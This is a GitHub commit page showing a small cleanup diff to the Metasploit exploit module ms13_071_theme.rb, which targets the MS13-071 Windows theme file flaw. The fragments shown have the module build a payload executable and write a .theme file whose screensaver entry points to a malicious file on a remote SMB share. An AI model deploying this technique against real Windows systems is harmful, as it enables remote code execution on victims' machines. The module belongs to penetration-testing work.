Skip to content

Commit 0e57277

Browse files
committed
Do cleanup
1 parent b9ed817 commit 0e57277

File tree

1 file changed

+4
-3
lines changed

1 file changed

+4
-3
lines changed

modules/exploits/windows/fileformat/ms13_071_theme.rb

Lines changed: 4 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -29,7 +29,7 @@ def initialize(info={})
2929
[
3030
'Eduardo Prado', # Vulnerability discovery
3131
'juan vazquez', # Metasploit module
32-
'Matthew Hall <[email protected]>' # Metasploit module refactored to use Remote::SMBFileServer
32+
'Matthew Hall <[email protected]>' # Metasploit module refactored to use Msf::Exploit::Remote::SMB::Server::Share
3333
],
3434
'References' =>
3535
[
@@ -66,10 +66,11 @@ def initialize(info={})
6666
end
6767

6868
def exploit
69-
print_status("Creating '#{datastore['FILENAME']}' file ...")
7069
self.file_contents = generate_payload_exe
7170
print_status("Malicious SCR available on #{unc}...")
71+
7272
# Default Windows XP / 2003 theme modified
73+
print_status("Creating '#{datastore['FILENAME']}' file ...")
7374
theme = <<-EOF
7475
; Copyright (c) Microsoft Corp. 1995-2001
7576
@@ -101,7 +102,7 @@ def exploit
101102
ScreenSaveActive=0
102103
103104
[boot]
104-
SCRNSAVE.EXE=#{@unc}
105+
SCRNSAVE.EXE=#{unc}
105106
106107
[MasterThemeSelector]
107108
MTSM=DABJDKT

0 commit comments

Comments
 (0)